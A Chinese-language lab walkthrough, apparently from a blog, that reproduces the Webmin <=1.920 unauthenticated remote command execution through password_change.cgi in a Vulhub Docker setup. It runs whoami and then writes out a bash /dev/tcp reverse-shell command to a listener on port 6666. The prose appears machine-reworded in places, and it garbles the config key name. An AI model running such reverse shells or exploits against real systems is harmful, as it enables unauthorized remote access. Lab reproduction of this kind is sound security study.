漏洞叙述
近日webmin被发觉存有一处远程命令执行漏洞,通过研究后,基本猜想其为一次侧门嵌入事情,webmin是现阶段功能最强有力的根据web的unix系统管理专用工具,管理员根据网页浏览webmin的各种各样管理功能并进行对应的管理姿势,当客户打开webmin重置密码功能后,攻击者可以根据推送post请求在目的系统软件中执行随意指令,且不用身份认证。
危害范畴:webmin <=1.920
漏洞重现
进到到vuhub以后,就立即执行docker-compose up -d获取镜像文件构建
搭建好以后,立即浏览192.168.1.1:10000 可是vuhub构建的网址它是不太好的,因此要按照它出错的提醒去改动非常, 因此这儿得话,就必须用https去浏览,要不然会不给浏览:https://192.168.1.1:10000/
接着就是咱们的漏洞运用,浏览https://192.168.67.135:10000/password_change.cgi,那样的话,去浏览它是会出错的,因此这儿大家必须去改动一下环境变量。
接着就是进到后台管理改动环境变量,这儿得话,就立即用docker exec it id号 /bin/bash
进到到/etc/webmin文件目录下,查询config文件。我们要改动的內容是config中的referers_one=1这一配备。
可是在docker器皿中,它是并没有编辑软件的,因此这儿得话,大家必须组装一个vim编辑软件
cat /etc/os-release先进到器皿查询桌面操作系统,明确应用yum或是apt组装专用工具
能够看见应用的debian8的电脑操作系统,下面apt组装, apt install vim
接着就是编写这一文档config,随后将referers_one=1改成referers_one=0
然后再去浏览那一个途径就可以看到,大家那边的网页页面也发生了相对性应的转换,它已经不出错了。
那麼下面得话,便是运用poc重现漏洞,这儿得话,要浏览https://192.168.1.1:10000/password_change.cgi而且用burp抓包软件
应用在网上的poc怼,见到取得成功执行指令
poc如下所示
以后看到实际效果,很显著的取得成功执行了指令。
执行一个whoami,它这儿也顺利的导出比较应的管理权限
那麼大家就需要反跳shell,因为它这儿可以执行执行指令,那麼大家就可以立即执行bash -c “bash -i >& /dev/tcp/192.168.1.1/6666 0>&1” 接受shell网络服务器的6666端口号)
那麼得话,执行这一指令,那麼大家网络服务器那里就需要监视6666,接受反跳回家的shell。 这儿得话,必须将payload进一方面的url编号再去执行
网络服务器那里监视6666端口号接受反跳回家的shell可以看到大家执行的payload,右侧的网页页面一片空白,就表明成功了。
随后就可以看到完成的反跳了一个shell过来了。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。